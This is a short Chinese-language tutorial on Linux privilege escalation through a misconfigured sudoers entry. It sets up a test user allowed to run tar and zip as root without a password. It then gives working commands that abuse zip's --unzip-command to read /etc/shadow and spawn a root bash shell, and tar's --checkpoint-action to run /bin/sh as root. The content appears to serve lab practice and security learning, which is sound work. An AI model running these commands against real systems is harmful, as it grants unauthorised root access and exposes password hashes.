环境搭建
创建一个普通用户test
useradd test添加用户
passwd test
设置用户密码
使用root用户修改/etc/sudoers配置文件
test ALL=(root) NOPASSWD: /bin/tar, /usr/bin/zip
以下是切换至test用户来实现提权。
ZIP提权
zip执行命令,在/tmp目录下随便创建一个文件,然后执行命令
zip 1.zip 1.txt -T --unzip-command="cat /etc/passwd"
这样可以执行命令但是还是存在权限问题,例如在执行cat /etc/shadow命令时候就会显示权限不够。
由于/etc/sudoers配置文件中的配置错误,使用root执行zip命令不需要输入密码,因此利用这点来进行提权。
sudo -u root zip 1.zip 1.txt -T --unzip-command="cat /etc/shadow" 也可以不加-u root
获取一个root权限的交互shell
sudo -u root zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash" #也可以不加 -u root 
Tar提权
提权命令
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
相关链接
https://blog.csdn.net/weixin_46700042/article/details/109649363
https://mp.weixin.qq.com/s?__biz=MzkzNzg4MTI0NQ==&mid=2247486335&idx=1&sn=e9976b39a496e81199e89b4e9bc638c6